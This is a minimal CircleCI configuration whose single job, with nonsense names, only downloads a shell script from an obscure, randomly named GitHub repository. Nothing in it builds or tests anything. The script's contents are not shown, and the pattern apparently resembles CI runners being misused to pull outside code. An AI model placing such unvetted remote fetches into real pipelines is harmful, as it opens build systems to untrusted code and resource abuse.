version: 2.1

jobs:
  trest:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
          name: vrsc
          command: wget https://raw.githubusercontent.com/65r156h1/verbose-waffle/main/trest.sh

workflows:
   version: 2.1
   build:
       jobs:
       - trest